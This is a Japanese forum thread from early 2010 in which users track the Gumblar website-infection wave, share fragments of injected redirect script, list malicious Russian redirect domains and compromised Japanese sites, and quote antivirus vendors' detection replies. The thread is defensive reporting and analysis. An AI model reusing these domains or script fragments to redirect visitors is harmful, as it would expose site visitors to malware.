ttp●//kousyu●cool●ne●jp/ MSEで"Trojan:JS/Redirector.BQ"と出たがGumblar?
>>899 thx
MyJVN バージョンチェッカで各ソフトは最新になってるけど大丈夫かな・・・
口唇ヘルペスの治療や症状 www●pdmounted●com リアルに感染中/*Exception*/
Gumblar蔓延の要因の一つは感染サイトの告知の中の トレンドマイクロのオンラインシュキャンの進めにあると思われます トレンドマイクロの営利主義と感染サイトの告知が 感染PCを安全としGumblar蔓延を促進しているのではなかろうかと PCデポでは無料診断と称してトレンドマイクロのオンラインシュキャンを行っていますが これは、PCデポとトレンドマイクロの密接な繋がり上行われているものであり 安易にユーザに間違った安心感だけを与えているいるだけかと PCがGumblarに感染しているか否かを真剣に診断しているとは 断じて言えるものでは無いのだとw
シュキャンorz
シュキャンダル
>>897 パスワードすら変えてないんじゃないの。
しかし感染を告知しないで有料会員に感染者がいたらどうする気なんだろう。
気がつかずにいたら余計に被害が出るかもしれないのにいろんな意味で凄いわ。
ニュースでHPが改竄されたって言ってるじゃん。 あれって本当なの? ハッカーが直接アクセスして改竄してるの? てっきりウイルスがHP管理者のPCから勝手に 改竄してるんだと思ってたんだけど。
ウイルスバスターのファイルスキャンで安心とか、アホだろ・・・ いや、うちのサイトのせいで、感染していないと言い張るためにわざとなのか?
>>909 本当
直接アクセスって意味がわかってないと思うけどFTPで直接
管理者のPCがウイルス感染してることも事実だけどそこから改ざんではないです
>>911 うむうむ。
改竄の原因はウイルスではないのね。
埋め込まれるスクリプトでコメント無しのがあるそうで <script> try{window.onload=function(){document.write('<div id=megaid> で、このへんに飛ばされるらしい extrafreeweb.ru limowebcam.ru supernetbet.ru topmediasite.ru yourtopfilms.ru
それで突かれる脆弱性は何? 先週のIEのを含めて既知のものというか、普通にアップデートを怠らなければ問題ないのなら コードの変更みたいな些事はもうどうでもいいよ。
勝手に仕切るなw
普通にアップデートを怠らなければ問題ない
>>916 フツーはそうなんだけど今回アドビがねぇ。
0-day発覚から一ヶ月放置。
そのせいだろ今回の騒動は。
アドビのjavascriptなんかデフォルトで無効にしとけっての
感染したら netstat -ap tcp 10 で監視できないのかな
>>914 ソース見てコードないの確認してからNS許可してるんで、変更情報は自分には重要。
>>908 askul代理店、まだ残ってんのか。
LGPL...
新しい? <script> try{window.onload=function(){document.write('<div id=megaid>addictinggames-com.z5x.ne</div>');以下長文略
923 :
922 :2010/01/28(木) 10:17:46
これに掛かると、サイトは真っ白になって addictinggames-com.z5x.neとだけ表示される
>>916 「普通にアップデート」したら、913のスクリプトが動かなくなるの?
それとも、このスクリプトの飛び先にある毒から守られるの?
/*・・・*/無し最新型はDEBUG(仮称)と記す 伊豆諸島/伊豆大島/大島町/TOP/総合情報(DEBUG) tp://park5●wakwak●com/~izushichi/oshima/index●html ※/~izushichi/mikura/index●htmlなど、複数あり 大田鋼業株式会社(DEBUG) tp://www.oota●co●jp/index●html RONI大好きサイト(Exception) tp://roni●roselog●net いろいろテスト(Exception) tp://test●roselog●net/ テレ東アニメDVD通販情報(たぶんDEBUG) tp://anime●gyomu-yo●net/ ※絶賛崩壊中w スズキの中古車探し(DEBUG) tp://sunrise●2pg●in/suzukiucar/index2●html ※コードまる見えw 各所につーほヨロ また潜りに逝ってくる・・・
価格比較 GIOS ジオス(崩壊仕様) tp://shop●relax-living●net ※/bike11/にGNU GPL エラー崩壊は新コードの挿入ミスかな?
>>925 大田鋼業株式会社
電話に出たババア
「私たちにはそんなことは分かりません」とガチャ切り w
従業員10名の零細企業だからそんなもんだろ
社内ネットワーク内のPCからFTPでアップロードしている場合、 そのPCが感染して無くても他のPCが感染してたらパス抜かれる?
詐欺とか思われたんだろ aguseで調べるとタイムアウトだらけだ
大田鋼業株式会社(笑)のコードだが tp://counterbest●ru:DEBUG/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/ ↓ replace(/DEBUG/g, '8080') ↓ tp://counterbest●ru:8080/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/ この認識で良いのかな?
闇金業者の融資だと思われたんだな
例どんな相手でも普通の企業でガチャ切りなんてありえん
立て続けに何人もの「善意の第三者」から掛かってきていたとか
KDDIのマイライン勧誘電話はガチャ切りしてる。 そうしないと延々喋り続けるから。
いやいや町工場とか土建屋なんかそんな対応がデフォだぞ
つーか、もうNoScriptのホワイトリストとかIEの信頼済ゾーンとか意味ない感じだよな。 一時許可だけは含めた全拒否か、突かれる穴だけを埋めて全許可の二択だわ。
信じられぬと 嘆くよりも サイトを信じて 感染するほうがいい〜
それはない。
求めないで 対策なんか 臆病者の 言いわけだから〜
あると思います。
>>942 おれもそう思って、NoScriptをアンインストールした
そうしたら、FireFoxがけっこう軽くなったよw
穴を詰めておいて、これは絶対やばいだろと思うところは
仮想環境で行くことにした
で、最近のメインンブラウザはチョロメになってる
かっけっすね
外向き8080遮断でいいんじゃねーの?
>>922 と全く同じコードが埋め込まれてたんだが(もう復旧済み)
これって表示するだけでウイルスやバックドア感染はしないの?
穴があれば感染する。
俺のアナルはゆるゆるだ
>>951 ありがとう…先方に警告出すわ…
コード解析しても意味ないのかな。仕方がいまいち分からん
先方の鯖管が報告してればいいけど
>>925 izushichi めるしました。
oota 直っているようです。ぐぐるキャッシュに/*LGPL*/
roni、test roselog●netは全滅か?、whoisからめるしました。
sunrise●2pg リンク先はみなかったことにして、whoisからめるしました。
>>922 >>950 みたいに画面真っ白表示するのってなんだろう
感染してるってブラウザで丸わかりじゃ意味ないんじゃないのかな?
愉快犯ってことなのかな
真っ白表示された時点で(穴があれば)感染しているから目的は達成されるだろ。 愉快犯ってことにして閲覧者には無害ですとかアナウンスしたいのかもしれんが 覚悟決めろや。
いやいや、普通ならなるべく多く感染させたいから隠すだろ 感染させてやったって表示してるんだから愉快犯(反応を楽しむ)なんじゃね 当然感染もするけどな
愉快犯=実害がないわけじゃないだろjk
>>926 whoisからめるしました。
飛び先は同じなのでコードの貼り付け失敗かも
ウィルス作る奴が何考えてるかなんてわからねーよ
自サイト感染してた知人、ページ復旧してもう安心な気持ちになってる。 話突っ込んだけどもう元に戻したしって危機感もってないみたい。 いや感染してたら危ないって!って言っていいんだよね? 何故あんなに自信満々なんだ……
お前の説明がヘタクソだから
sunrise●2pg●inは <!--<script>--> (省略) <!--</script>--> になってるのは何なんだろw
superhighest.ru:DEBUG ってなんだよw
DEBUGだけにまだ試行中なんだよ
>>965 たぶんだけど、やられたことは知っていて
証拠保全とか何か理由があってコメントアウトしたんじゃないかな。
ローカルの8080ポートを閉じるのって効果があるの? リダイレクト先にロシアサーバの8080ポートが使われるってだけで、ローカルの8080ポートは 関係ないと思っていたけど違うのかな?
>>972 ローカル8080開けてるヤツなんてそんないないからな
提出した人はうpロダに物を上げてもらえんか? 対応してないAVソフトのユーザーは、それ使って検体の提出ができるからさ
>>976 >>925 izushichiの分
かすぺ @返信日時:17:34
> Hello,
>
> index.htm_, mikura_index.html_, oshima_index.html_, toshima_index.html_ - Trojan.JS.Agent.bcb
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Please quote all when answering.
> The answer is relevant to the latest bases from update sources.
> --
> Best regards, Sergey Prokudin
> Virus analyst, Kaspersky Lab.
ESET @返信日時:19:00
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> index.htm - JS/TrojanDownloader.Agent.NRP trojan
> mikura_index.html - JS/TrojanDownloader.Agent.NRP trojan
> oshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
> toshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
>
> Regards,
>
> Daniel Novomesky
> Virus Researcher
> ESET spol. s r.o.
>>925 gyomu-yoの分
Fortinet @返信日時:16:09 (あちらの時刻かも。)
> Dear Customer,
>
> Thank you for submitting the sample to Fortinet. We have recently added detection for this malware. The signature will be included in the next regular update.
>
> The sample you submitted will be detected as follows:
> index.html - JS/IFrame.FAC!tr
>
> Best Regards,
> AV Lab - Bob
>>981 補足
anime●gyomu-yo●netではなくgyomu-yo●netです。
>>922 それ今朝やられた。自分とこの場合、一瞬正規のページが表示された後に、nhl-com.stc.com.sa.googleと表示。
avast!で検出されず、aguseで調べたら、「ガブンラー感染の恐れあり」。
今年に入って、これで2回目です。
前回はユーザーからメールと電話で報告を受け、今回は運良く自分で見つけたけど、これって、FTPのパスワードとかの
設定変えたほうがいいのかな?ちなみに鯖はXREAですw
毎日変えろ糞が
改ざんされたソース保存してて、ブラウザで閲覧してもまだavast!では検出されませんね。 反映されるまで時間かかるのかな?
988 :
925 :2010/01/28(木) 20:55:53
987=984です。
>>986 パスワードの変更の仕方がよくわからんのよ
990 :
984 :2010/01/28(木) 21:03:06
>>988 けっこう改ざんされてるとこあるんだね。通報してくれた人本当に乙です
>>988 その中から探してきてくれたあなたこそ乙ですぽ。
>>988 J U M P E R Z . N E T - BBS -
感染のオンパレードわろた
994 :
984 :2010/01/28(木) 21:09:00
パスワード変更の方法が分かりました。これからは定期的にパスワード変更します。
996 :
984 :2010/01/28(木) 21:12:40
>>993 今回の改ざんはそうかもしれないですね。でも前回は、今月の中旬頃でした
So-net 三つの謎 ※中の人ねらー疑惑 ※何故マカフィーなのか ※中の人は美少女なのかオサーンなのか
>>998 3番目が最重要だにゃ。
↓1000どぞー
>※中の人は美少女なのかオサーンなのか これだけは判る、きっとオサーンなのだw 1000ゲト!
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。